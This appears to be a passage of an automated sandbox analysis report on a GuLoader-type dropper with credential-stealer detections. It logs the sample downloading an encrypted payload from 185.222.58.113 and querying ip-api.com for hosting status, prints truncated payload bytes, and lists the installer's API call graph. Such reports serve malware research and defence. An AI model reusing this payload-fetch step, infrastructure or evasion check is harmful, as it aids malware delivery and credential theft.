                                      Jul 1, 2024 12:09:17.669760942 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669760942 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669761896 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669761896 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669763088 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669763088 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669764042 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669764042 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669764042 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669765949 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669778109 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669789076 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669836044 CEST4977780192.168.11.20185.222.58.113
                                      Jul 1, 2024 12:09:17.669926882 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669929028 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669929981 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669929981 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669930935 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669930935 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669931889 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669931889 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669933081 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669933081 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669934034 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669934034 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.669934988 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:09:17.670003891 CEST4977780192.168.11.20185.222.58.113
                                      Jul 1, 2024 12:09:17.670121908 CEST4977780192.168.11.20185.222.58.113
                                      Jul 1, 2024 12:09:17.670226097 CEST4977780192.168.11.20185.222.58.113
                                      Jul 1, 2024 12:09:20.686219931 CEST4977880192.168.11.20208.95.112.1
                                      Jul 1, 2024 12:09:20.820122957 CEST8049778208.95.112.1192.168.11.20
                                      Jul 1, 2024 12:09:20.820403099 CEST4977880192.168.11.20208.95.112.1
                                      Jul 1, 2024 12:09:20.820651054 CEST4977880192.168.11.20208.95.112.1
                                      Jul 1, 2024 12:09:21.012829065 CEST8049778208.95.112.1192.168.11.20
                                      Jul 1, 2024 12:09:21.068262100 CEST4977880192.168.11.20208.95.112.1
                                      Jul 1, 2024 12:09:52.595114946 CEST8049778208.95.112.1192.168.11.20
                                      Jul 1, 2024 12:09:52.595479012 CEST4977880192.168.11.20208.95.112.1
                                      Jul 1, 2024 12:10:26.591917038 CEST8049778208.95.112.1192.168.11.20
                                      Jul 1, 2024 12:11:06.092231989 CEST4977780192.168.11.20185.222.58.113
                                      Jul 1, 2024 12:11:06.313710928 CEST8049777185.222.58.113192.168.11.20
                                      Jul 1, 2024 12:11:06.313909054 CEST4977780192.168.11.20185.222.58.113
                                      TimestampSource PortDest PortSource IPDest IP
                                      Jul 1, 2024 12:09:20.512279987 CEST5309553192.168.11.201.1.1.1
                                      Jul 1, 2024 12:09:20.631547928 CEST53530951.1.1.1192.168.11.20
                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jul 1, 2024 12:09:20.512279987 CEST192.168.11.201.1.1.10x5101Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jul 1, 2024 12:09:20.631547928 CEST1.1.1.1192.168.11.200x5101No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                      • 185.222.58.113
                                      • ip-api.com
                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.11.2049777185.222.58.113807736C:\Users\user\Desktop\004552024107.bat.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 1, 2024 12:09:16.329804897 CEST178OUTGET /bJibCYgZszSl185.bin HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Host: 185.222.58.113
                                      Cache-Control: no-cache
                                      Jul 1, 2024 12:09:16.551577091 CEST1289INHTTP/1.1 200 OK
                                      Content-Type: application/octet-stream
                                      Last-Modified: Mon, 01 Jul 2024 03:04:31 GMT
                                      Accept-Ranges: bytes
                                      ETag: "50ebdb6463cbda1:0"
                                      Server: Microsoft-IIS/8.5
                                      Date: Mon, 01 Jul 2024 10:09:15 GMT
                                      Content-Length: 242240
                                      Data Raw: b7 3a de 42 c8 fb f4 74 bd 33 05 5b 3a 8a 23 09 05 6c 22 05 c0 22 90 90 a6 1b 11 eb 08 82 08 2c 30 ff 42 3d 2c 23 6d 1e ba 38 a3 24 ab ea 37 d3 5b 7e 65 38 7a 1e 43 f4 52 38 47 5e 90 56 0b 66 a0 41 e7 74 62 f3 73 17 bb 07 9a 95 0a c3 2b 29 48 60 d9 a9 2f 1b 34 30 e5 a3 9b 98 56 b6 04 3f 33 3e 0e 5e 91 80 86 9c 97 4f 14 5e 41 89 de e7 03 a5 e1 ce 42 b1 e6 f5 c0 03 51 45 c2 53 c4 6b b2 3c 7b 85 8d e7 10 07 01 e0 d9 f2 eb 9c ab 86 96 e0 15 c8 a9 df 84 de 83 c9 ca f6 de ea 07 88 77 2a 95 a6 21 93 3b 85 15 b5 99 62 ba 84 33 ff 61 15 d6 a6 8d 34 49 89 3f b8 ed 73 94 47 f7 7d 20 95 6b 34 d2 dc 75 8a b2 b3 12 10 8d 56 58 ec 51 27 11 38 f2 d2 6e 80 0e af e0 f2 03 e6 3c b4 1c 17 21 47 14 ec 14 5a ee 86 ed c2 18 6a 86 25 20 3d 66 dc 17 97 1f 75 02 ad a9 84 3a c5 07 f7 b2 fb 20 38 dc ea 3b b3 24 b3 88 52 d6 e8 e4 89 eb 76 3b 7f 05 12 ab 93 ec 6f 76 13 4f 36 e8 d8 e3 c8 65 65 3d de bd 69 80 70 07 21 c1 7e cc 67 da f3 dd 54 b9 12 34 60 1f 1a a4 8f 19 25 b3 3e a1 a5 6e f7 42 e2 56 70 70 95 ea f7 de 9f 59 be a0 9b [TRUNCATED]
                                      Data Ascii: :Bt3[:#l"",0B=,#m8$7[~e8zCR8G^VfAtbs+)H`/40V?3>^O^ABQESk<{w*!;b3a4I?sG} k4uVXQ'8n<!GZj% =fu: 8;$Rv;ovO6ee=ip!~gT4`%>nBVppYCzB.TS'"#6>6Z?FarZLz}6WY@-i]*1ORC#_<c}28#h8NRV\%T<M+<ltExj*00<9~kA+To9|^bblQrOx+{\,4q(MmC+ZH;Vo((RaZUh0CC;Xi,>)<(?fZb%l&.2S\T{>\ 05G]&?^FpLsLi@poVsWsij}@r9+crKlQ{1)lC8%uABQo/%TBRS)>##x_"-d0s:H6"VFUm|QL}^fb50z?e$Db(*a+5J>J<,RJ2oNg7*2-sOrQgR\H*nbKhmHrv2|).(F=K [TRUNCATED]
                                      Jul 1, 2024 12:09:16.551656008 CEST1289INData Raw: 62 d7 06 aa 7b d4 7e fa 6a 6b ce 22 3f 19 d4 e2 64 fd 3f 54 05 e2 52 ed 44 92 2c c5 91 a5 d2 69 ae b1 60 fc db 98 b8 6b 55 65 04 da f2 67 0d 4d 7c 0e ac 97 06 1e 1b b7 6e 1c 98 d5 e7 b4 47 6e 35 12 d6 c6 28 02 86 ae c1 33 a7 15 63 ce b8 b8 79 3c
                                      Data Ascii: b{~jk"?d?TRD,i`kUegM|nGn5(3cy<~Ga `egEKr2j$-<qC!O>l]N[BoYt h7/Ibbpe sl=-4'X:gP >U4}nuR%`zU.<HvXZC
                                      Jul 1, 2024 12:09:16.551717997 CEST1289INData Raw: 61 e2 e0 cb 82 05 71 27 d6 8f 90 eb b9 f7 8b 52 6e 36 a4 d4 1e 25 c6 c0 e6 30 05 9e 5d 86 98 00 86 83 fa aa 8f 4f 56 24 41 21 5c b4 a7 08 e0 b4 89 c5 61 9d 84 7d 32 29 cd cb c2 d3 8f 48 96 a5 03 d3 95 09 56 91 43 06 56 4d 56 db c0 9f 55 b7 6f 85
                                      Data Ascii: aq'Rn6%0]OV$A!\a}2)HVCVMVUoG<Yflr^oi04s|CC[6'u*D~%>@d~UUpOuPxzv&,4[On>1+rTG(*M\=kK.AFFmF4ah<X
                                      Jul 1, 2024 12:09:16.551832914 CEST1289INData Raw: ff 2f 90 ed 53 2e c7 bd 36 05 d0 e9 0b 40 d2 99 6f 2a 14 10 0c a1 57 75 2c 2b 64 bf 05 21 26 f1 c7 24 6c 1b 3d 13 60 fc 66 86 e6 37 72 e6 71 8a ae 43 d3 4d 1d 70 9a 7b 53 86 11 3d ce 67 64 96 e9 a4 80 bf 7c c7 2e 99 f9 4d e4 74 4e 38 8a 3c 65 8e
                                      Data Ascii: /S.6@o*Wu,+d!&$l=`f7rqCMp{S=gd|.MtN8<e1I?@~3"+hu`$UqnacGk.r.-u!j1q$OgisISm=Qp:})cnI*#>65<:Bs+b
                                      Jul 1, 2024 12:09:16.773330927 CEST1289INData Raw: 06 26 03 b9 52 e2 ac 7a 29 df 84 23 03 95 5e 30 0a 22 c2 d6 4c 92 9d 71 ae fa 36 9a 64 b4 18 b5 a3 a6 3c 5b 52 86 aa 7b ec fb 05 6a eb f6 8f c1 66 ab 48 64 a8 51 26 57 88 37 3d 30 fd 0c b5 f4 d6 ac 25 d8 d4 40 b4 71 c2 ea 4b 1d cb 6b a2 f2 67 f3
                                      Data Ascii: &Rz)#^0"Lq6d<[R{jfHdQ&W7=0%@qKkgA~Ag%O&3z&GRA GAqe2T/!6Yd k2 I{vj DoOs![u/')CIYkO6-942}'m
                                      Jul 1, 2024 12:09:16.773405075 CEST1289INData Raw: 7f d0 af ef 50 b5 5f 86 0a 27 cb f5 23 36 7c 9c 2c e9 a4 ca f5 37 f9 5a d0 7e a4 3f ec cd 7c e9 46 d5 6d 13 ef e4 e1 d0 68 64 5a 4c 85 32 11 9f b9 89 5a 7f 36 a4 de 6e 46 59 e5 96 e2 d3 6d 59 86 be 29 98 81 81 19 98 4f 52 04 9d 2d 5a c9 c2 05 e5
                                      Data Ascii: P_'#6|,7Z~?|FmhdZL2Z6nFYmY)OR-ZcU*#<#:8&~\#=-7SOl@ya&j0:"~kA+&u&p^phL|QJKJh{\,4&Nm{+Zl(b
                                      Jul 1, 2024 12:09:16.773461103 CEST1289INData Raw: a4 ca d8 31 15 79 77 23 a3 3c fe 86 bb 68 b6 a7 27 81 4e f9 fc 5c cd 51 ea f1 47 c0 c3 44 fb 75 ce 97 e7 1a 07 be e9 79 06 67 9e 43 e0 d0 e9 f1 64 cf 9b 14 32 18 13 08 ab 79 77 2f 56 7c be 3c 3d 0c ef c5 a1 87 1a 3d 37 40 de 64 85 e9 db 70 e6 05
                                      Data Ascii: 1yw#<h'N\QGDuygCd2yw/V|<==7@dpLRqL%gD:6o{2>aAoIB$2+4m`*~ZqjcPcE z(]/cV3w~N@mRm&NW|/
                                      Jul 1, 2024 12:09:16.773525953 CEST1289INData Raw: 74 07 e1 36 0f bd 7f ff 2e 94 6a 08 d7 fc 31 bc 42 a0 84 54 d3 c1 ed 3d 80 b9 76 b5 fb 6c d9 72 d4 8d 20 06 26 02 b9 52 e2 ac 75 10 d5 84 dd 0f 95 7e 11 02 22 c2 28 bc 93 a4 74 50 f6 36 a2 41 b8 18 b5 9b f9 c3 9d a8 ac aa 7b d7 ce 04 6a 90 cf dd
                                      Data Ascii: t6.j1BT=vlr &Ru~"(tP6A{j?Tbd7g0uX@I%gg?/bnmr&L`^{GWG#fRPEE}30 -\!6Y kHE{rhPD)M=es
                                      Jul 1, 2024 12:09:16.773699999 CEST1289INData Raw: 8f 19 2f 4d 30 fd 63 4d d5 0d e2 56 8e 7e 79 e9 f7 66 96 55 be 80 9f f0 1a e9 51 dd f2 61 a2 7a 90 bc 00 7f 2e 8b d5 50 95 55 a6 1a 27 b9 22 49 6e 24 01 d2 e5 aa 34 db 32 f9 7a d5 00 a1 3f 12 c7 02 e0 46 2b 11 6d e2 c4 e9 a0 07 72 a4 4d b6 86 ef
                                      Data Ascii: /M0cMV~yfUQaz.PU'"In$42z?F+mrMwvy6WSE-AT*f1^c@<c>';2@H8dXARZs<+7"NLu@!4nI)>;9^w<O';pZ_<jlQu[|4Cxw
                                      Jul 1, 2024 12:09:16.773785114 CEST1289INData Raw: 96 1a 4e ea 48 18 bd 7c 4c e4 38 e3 c2 e4 47 5c 0d 35 c3 a6 5b c9 b5 29 c5 88 73 95 fa b4 5a 9a 66 37 e8 5a e4 da 31 15 87 85 2d a0 1c fd 78 b7 6b 48 86 19 98 4e f9 02 75 df 49 ea f7 7e 96 30 ba 04 75 ca 97 e7 1a 05 b0 ed 79 0c c5 40 45 e0 d0 e9
                                      Data Ascii: NH|L8G\5[)sZf7Z1-xkHNuI~0uy@Ef4utN6V-f=jdRup`]q2@&gdl.ow<aZ3MNCN;)uJ*U&~TqjpG}wX!(/x]#*Cj89
                                      Jul 1, 2024 12:09:16.773840904 CEST1289INData Raw: b6 1a 89 1b 3c dd 25 75 0f b0 c4 47 5e e5 a0 99 c2 4c 47 bf 69 c9 29 bc 1c 97 ed 2f 36 95 2b 07 b4 55 a8 70 05 e1 68 71 b4 7e ff d4 b8 63 08 29 f0 cf b2 cc c9 bb b0 21 3e 12 3d 80 b9 76 b5 2f 76 d0 7a d4 fe 22 06 06 0e b9 52 f3 72 7b 10 d5 84 dd
                                      Data Ascii: <%uG^LGi)/6+Uphq~c)!>=v/vz"Rr{~Q (BlvP7DO=bW:v>TbDQ5gp90@JJ%gb|kAjEL:2v{IEHa? eG\A$wt'-<aY


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.11.2049778208.95.112.1807736C:\Users\user\Desktop\004552024107.bat.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 1, 2024 12:09:20.820651054 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                      Host: ip-api.com
                                      Connection: Keep-Alive
                                      Jul 1, 2024 12:09:21.012829065 CEST174INHTTP/1.1 200 OK
                                      Date: Mon, 01 Jul 2024 10:09:20 GMT
                                      Content-Type: text/plain; charset=utf-8
                                      Content-Length: 5
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 60
                                      X-Rl: 44
                                      Data Raw: 74 72 75 65 0a
                                      Data Ascii: true


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:06:08:57
                                      Start date:01/07/2024
                                      Path:C:\Users\user\Desktop\004552024107.bat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\004552024107.bat.exe"
                                      Imagebase:0x400000
                                      File size:530'814 bytes
                                      MD5 hash:2D40C2AEFEF620E7FB177F0CF24D8EA5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.86246482988.00000000070C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:06:09:08
                                      Start date:01/07/2024
                                      Path:C:\Users\user\Desktop\004552024107.bat.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\004552024107.bat.exe"
                                      Imagebase:0x400000
                                      File size:530'814 bytes
                                      MD5 hash:2D40C2AEFEF620E7FB177F0CF24D8EA5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.91159403030.0000000035875000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:20.9%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:16.2%
                                        Total number of Nodes:1546
                                        Total number of Limit Nodes:39
                                        execution_graph 4987 6c6010e0 4989 6c601110 4987->4989 4988 6c60129a GlobalFree 4989->4988 4990 6c6011cd GlobalAlloc 4989->4990 4991 6c601286 GlobalFree 4989->4991 4993 6c601295 4989->4993 4994 6c6012f6 2 API calls 4989->4994 4995 6c601165 GlobalAlloc 4989->4995 4997 6c601361 4989->4997 5001 6c60133d 4989->5001 4990->4989 4991->4989 4993->4988 4994->4989 4995->4989 4998 6c601389 4997->4998 4999 6c60136a 4997->4999 4998->4989 4999->4998 5000 6c601370 lstrcpyA 4999->5000 5000->4998 5002 6c601344 5001->5002 5003 6c6012b4 2 API calls 5002->5003 5004 6c60135f 5003->5004 5004->4989 5005 6c601661 5011 6c60154b 5005->5011 5007 6c6016bf GlobalFree 5008 6c601679 5008->5007 5009 6c601694 5008->5009 5010 6c6016ab VirtualFree 5008->5010 5009->5007 5010->5007 5013 6c601551 5011->5013 5012 6c601557 5012->5008 5013->5012 5014 6c601563 GlobalFree 5013->5014 5014->5008 3892 4015c2 3896 402c5e 3892->3896 3895 4015db 3897 402c6a 3896->3897 3902 406320 3897->3902 3900 4015c9 SetFileAttributesA 3900->3895 3914 40632d 3902->3914 3903 40656e 3904 402c8b 3903->3904 3941 40628d lstrcpynA 3903->3941 3904->3900 3919 406587 3904->3919 3906 406545 lstrlenA 3906->3914 3909 406320 15 API calls 3909->3906 3911 40644c GetSystemDirectoryA 3911->3914 3912 406462 GetWindowsDirectoryA 3912->3914 3913 406587 5 API calls 3913->3914 3914->3903 3914->3906 3914->3909 3914->3911 3914->3912 3914->3913 3915 406320 15 API calls 3914->3915 3916 4064ee lstrcatA 3914->3916 3918 4064c5 SHGetPathFromIDListA CoTaskMemFree 3914->3918 3928 406174 3914->3928 3933 4066b5 GetModuleHandleA 3914->3933 3939 4061eb wsprintfA 3914->3939 3940 40628d lstrcpynA 3914->3940 3915->3914 3916->3914 3918->3914 3926 406593 3919->3926 3920 4065ff CharPrevA 3922 4065fb 3920->3922 3921 4065f0 CharNextA 3921->3922 3921->3926 3922->3920 3923 40661a 3922->3923 3923->3900 3925 4065de CharNextA 3925->3926 3926->3921 3926->3922 3926->3925 3927 4065eb CharNextA 3926->3927 3949 405c4a 3926->3949 3927->3921 3942 406113 3928->3942 3931 4061d7 3931->3914 3932 4061a8 RegQueryValueExA RegCloseKey 3932->3931 3934 4066d1 3933->3934 3935 4066db GetProcAddress 3933->3935 3946 406647 GetSystemDirectoryA 3934->3946 3937 4066ea 3935->3937 3937->3914 3938 4066d7 3938->3935 3938->3937 3939->3914 3940->3914 3941->3904 3943 406122 3942->3943 3944 406126 3943->3944 3945 40612b RegOpenKeyExA 3943->3945 3944->3931 3944->3932 3945->3944 3947 406669 wsprintfA LoadLibraryExA 3946->3947 3947->3938 3950 405c50 3949->3950 3951 405c63 3950->3951 3952 405c56 CharNextA 3950->3952 3951->3926 3952->3950 3953 401a43 3954 402c5e 21 API calls 3953->3954 3955 401a4c ExpandEnvironmentStringsA 3954->3955 3956 401a60 3955->3956 3958 401a73 3955->3958 3957 401a65 lstrcmpA 3956->3957 3956->3958 3957->3958 3959 402543 3970 402c9e 3959->3970 3962 402c5e 21 API calls 3963 402556 3962->3963 3964 402560 RegQueryValueExA 3963->3964 3968 4027ed 3963->3968 3965 402580 3964->3965 3966 402586 RegCloseKey 3964->3966 3965->3966 3975 4061eb wsprintfA 3965->3975 3966->3968 3971 402c5e 21 API calls 3970->3971 3972 402cb5 3971->3972 3973 406113 RegOpenKeyExA 3972->3973 3974 40254d 3973->3974 3974->3962 3975->3966 5020 401744 5021 402c5e 21 API calls 5020->5021 5022 40174b SearchPathA 5021->5022 5023 401766 5022->5023 5024 401d44 5025 402c3c 21 API calls 5024->5025 5026 401d4b 5025->5026 5027 402c3c 21 API calls 5026->5027 5028 401d57 GetDlgItem 5027->5028 5029 40264d 5028->5029 5030 402ac5 SendMessageA 5031 402aea 5030->5031 5032 402adf InvalidateRect 5030->5032 5032->5031 3976 4023c9 3977 4023d1 3976->3977 3978 4023d7 3976->3978 3979 402c5e 21 API calls 3977->3979 3980 402c5e 21 API calls 3978->3980 3982 4023e7 3978->3982 3979->3978 3980->3982 3981 4023f5 3984 402c5e 21 API calls 3981->3984 3982->3981 3983 402c5e 21 API calls 3982->3983 3983->3981 3985 4023fe WritePrivateProfileStringA 3984->3985 3986 4020ca 3987 40218a 3986->3987 3988 4020dc 3986->3988 3991 401423 28 API calls 3987->3991 3989 402c5e 21 API calls 3988->3989 3990 4020e3 3989->3990 3992 402c5e 21 API calls 3990->3992 3997 40230f 3991->3997 3993 4020ec 3992->3993 3994 402101 LoadLibraryExA 3993->3994 3995 4020f4 GetModuleHandleA 3993->3995 3994->3987 3996 402111 GetProcAddress 3994->3996 3995->3994 3995->3996 3998 402120 3996->3998 3999 40215d 3996->3999 4001 402128 3998->4001 4002 40213f 3998->4002 4050 4053d1 3999->4050 4047 401423 4001->4047 4007 6c60176b 4002->4007 4004 402130 4004->3997 4005 40217e FreeLibrary 4004->4005 4005->3997 4008 6c60179b 4007->4008 4061 6c601b28 4008->4061 4010 6c6017a2 4011 6c6018c4 4010->4011 4012 6c6017b3 4010->4012 4015 6c6017ba 4010->4015 4011->4004 4099 6c60233f 4012->4099 4018 6c6017d0 4015->4018 4019 6c6017e9 4015->4019 4030 6c6017df 4015->4030 4016 6c601800 4112 6c602568 4016->4112 4017 6c60181e 4020 6c601824 4017->4020 4021 6c60186c 4017->4021 4023 6c6017d6 4018->4023 4028 6c6017e1 4018->4028 4019->4030 4109 6c602d53 4019->4109 4129 6c6015fb 4020->4129 4026 6c602568 8 API calls 4021->4026 4023->4030 4093 6c602ac8 4023->4093 4033 6c60185d 4026->4033 4027 6c601806 4121 6c6015e9 4027->4121 4103 6c602742 4028->4103 4030->4016 4030->4017 4046 6c6018b3 4033->4046 4135 6c60252e 4033->4135 4035 6c6017e7 4035->4030 4036 6c602568 8 API calls 4036->4033 4040 6c6018bd GlobalFree 4040->4011 4043 6c60189f 4043->4046 4139 6c601572 wsprintfA 4043->4139 4044 6c601898 FreeLibrary 4044->4043 4046->4011 4046->4040 4048 4053d1 28 API calls 4047->4048 4049 401431 4048->4049 4049->4004 4051 4053ec 4050->4051 4060 40548f 4050->4060 4052 405409 lstrlenA 4051->4052 4053 406320 21 API calls 4051->4053 4054 405432 4052->4054 4055 405417 lstrlenA 4052->4055 4053->4052 4057 405445 4054->4057 4058 405438 SetWindowTextA 4054->4058 4056 405429 lstrcatA 4055->4056 4055->4060 4056->4054 4059 40544b SendMessageA SendMessageA SendMessageA 4057->4059 4057->4060 4058->4057 4059->4060 4060->4004 4142 6c6012a5 GlobalAlloc 4061->4142 4063 6c601b4f 4143 6c6012a5 GlobalAlloc 4063->4143 4065 6c601d90 GlobalFree GlobalFree GlobalFree 4066 6c601dad 4065->4066 4078 6c601df7 4065->4078 4067 6c602181 4066->4067 4075 6c601dc2 4066->4075 4066->4078 4069 6c6021a3 GetModuleHandleA 4067->4069 4067->4078 4068 6c601c4d GlobalAlloc 4074 6c601b5a 4068->4074 4071 6c6021b4 LoadLibraryA 4069->4071 4072 6c6021c9 4069->4072 4070 6c601cb6 GlobalFree 4070->4074 4071->4072 4071->4078 4150 6c601652 GetProcAddress 4072->4150 4073 6c601c98 lstrcpyA 4077 6c601ca2 lstrcpyA 4073->4077 4074->4065 4074->4068 4074->4070 4074->4073 4074->4077 4074->4078 4080 6c602047 4074->4080 4085 6c601f89 GlobalFree 4074->4085 4086 6c6020c3 4074->4086 4088 6c6012b4 2 API calls 4074->4088 4144 6c6015c4 GlobalSize GlobalAlloc 4074->4144 4075->4078 4146 6c6012b4 4075->4146 4077->4074 4078->4010 4079 6c60221a 4079->4078 4084 6c602227 lstrlenA 4079->4084 4149 6c6012a5 GlobalAlloc 4080->4149 4082 6c6021db 4082->4079 4092 6c602204 GetProcAddress 4082->4092 4151 6c601652 GetProcAddress 4084->4151 4085->4074 4086->4078 4090 6c60211c lstrcpyA 4086->4090 4088->4074 4090->4078 4091 6c60204f 4091->4010 4092->4079 4095 6c602ada 4093->4095 4094 6c602b7f EnumWindows 4098 6c602b9d 4094->4098 4095->4094 4097 6c602c69 4097->4030 4153 6c602a74 4098->4153 4100 6c602354 4099->4100 4101 6c60235f GlobalAlloc 4100->4101 4102 6c6017b9 4100->4102 4101->4100 4102->4015 4107 6c602772 4103->4107 4104 6c602820 4106 6c602826 GlobalSize 4104->4106 4108 6c602830 4104->4108 4105 6c60280d GlobalAlloc 4105->4108 4106->4108 4107->4104 4107->4105 4108->4035 4110 6c602d5e 4109->4110 4111 6c602d9e GlobalFree 4110->4111 4157 6c6012a5 GlobalAlloc 4112->4157 4114 6c602574 4115 6c6025f3 lstrcpynA 4114->4115 4116 6c602604 StringFromGUID2 WideCharToMultiByte 4114->4116 4117 6c602628 WideCharToMultiByte 4114->4117 4118 6c602649 wsprintfA 4114->4118 4119 6c60266d GlobalFree 4114->4119 4120 6c6026a7 GlobalFree 4114->4120 4115->4114 4116->4114 4117->4114 4118->4114 4119->4114 4120->4027 4158 6c6012a5 GlobalAlloc 4121->4158 4123 6c6015ee 4124 6c6015fb 2 API calls 4123->4124 4125 6c6015f8 4124->4125 4126 6c6012f6 4125->4126 4127 6c601338 GlobalFree 4126->4127 4128 6c6012ff GlobalAlloc lstrcpynA 4126->4128 4127->4033 4128->4127 4130 6c601634 lstrcpyA 4129->4130 4131 6c601607 wsprintfA 4129->4131 4134 6c60164d 4130->4134 4131->4134 4134->4036 4136 6c60187f 4135->4136 4137 6c60253c 4135->4137 4136->4043 4136->4044 4137->4136 4138 6c602555 GlobalFree 4137->4138 4138->4137 4140 6c6012f6 2 API calls 4139->4140 4141 6c601593 4140->4141 4141->4046 4142->4063 4143->4074 4145 6c6015e2 4144->4145 4145->4074 4152 6c6012a5 GlobalAlloc 4146->4152 4148 6c6012c3 lstrcpynA 4148->4078 4149->4091 4150->4082 4151->4078 4152->4148 4154 6c602a7f 4153->4154 4155 6c602a84 GetLastError 4154->4155 4156 6c602a8f 4154->4156 4155->4156 4156->4097 4157->4114 4158->4123 5033 402e4a 5034 402e72 5033->5034 5035 402e59 SetTimer 5033->5035 5036 402ec7 5034->5036 5037 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5034->5037 5035->5034 5037->5036 5038 6c6022ea 5039 6c602354 5038->5039 5040 6c60235f GlobalAlloc 5039->5040 5041 6c60237e 5039->5041 5040->5039 4166 40244e 4167 402480 4166->4167 4168 402455 4166->4168 4169 402c5e 21 API calls 4167->4169 4170 402c9e 21 API calls 4168->4170 4171 402487 4169->4171 4172 40245c 4170->4172 4178 402d1c 4171->4178 4174 402466 4172->4174 4175 402494 4172->4175 4176 402c5e 21 API calls 4174->4176 4177 40246d RegDeleteValueA RegCloseKey 4176->4177 4177->4175 4179 402d28 4178->4179 4180 402d2f 4178->4180 4179->4175 4180->4179 4182 402d60 4180->4182 4183 406113 RegOpenKeyExA 4182->4183 4184 402d8e 4183->4184 4185 402e43 4184->4185 4186 402d98 4184->4186 4185->4179 4187 402dc1 4186->4187 4188 402d9e RegEnumValueA 4186->4188 4189 402e28 RegCloseKey 4187->4189 4190 402dfd RegEnumKeyA 4187->4190 4191 402e06 RegCloseKey 4187->4191 4194 402d60 6 API calls 4187->4194 4188->4187 4188->4189 4189->4185 4190->4187 4190->4191 4192 4066b5 5 API calls 4191->4192 4193 402e16 4192->4193 4195 402e38 4193->4195 4196 402e1a RegDeleteKeyA 4193->4196 4194->4187 4195->4185 4196->4185 5045 6c602c73 5046 6c602c8b 5045->5046 5047 6c6015c4 2 API calls 5046->5047 5048 6c602ca6 5047->5048 5049 401c53 5050 402c3c 21 API calls 5049->5050 5051 401c5a 5050->5051 5052 402c3c 21 API calls 5051->5052 5053 401c67 5052->5053 5054 401c7c 5053->5054 5055 402c5e 21 API calls 5053->5055 5056 401c8c 5054->5056 5057 402c5e 21 API calls 5054->5057 5055->5054 5058 401ce3 5056->5058 5059 401c97 5056->5059 5057->5056 5060 402c5e 21 API calls 5058->5060 5061 402c3c 21 API calls 5059->5061 5062 401ce8 5060->5062 5063 401c9c 5061->5063 5064 402c5e 21 API calls 5062->5064 5065 402c3c 21 API calls 5063->5065 5066 401cf1 FindWindowExA 5064->5066 5067 401ca8 5065->5067 5070 401d0f 5066->5070 5068 401cd3 SendMessageA 5067->5068 5069 401cb5 SendMessageTimeoutA 5067->5069 5068->5070 5069->5070 5071 402653 5072 402658 5071->5072 5073 40266c 5071->5073 5074 402c3c 21 API calls 5072->5074 5075 402c5e 21 API calls 5073->5075 5077 402661 5074->5077 5076 402673 lstrlenA 5075->5076 5076->5077 5078 405ec7 WriteFile 5077->5078 5079 402695 5077->5079 5078->5079 5080 403a54 5081 403a5f 5080->5081 5082 403a63 5081->5082 5083 403a66 GlobalAlloc 5081->5083 5083->5082 4342 4014d6 4347 402c3c 4342->4347 4344 4014dc Sleep 4346 402aea 4344->4346 4348 406320 21 API calls 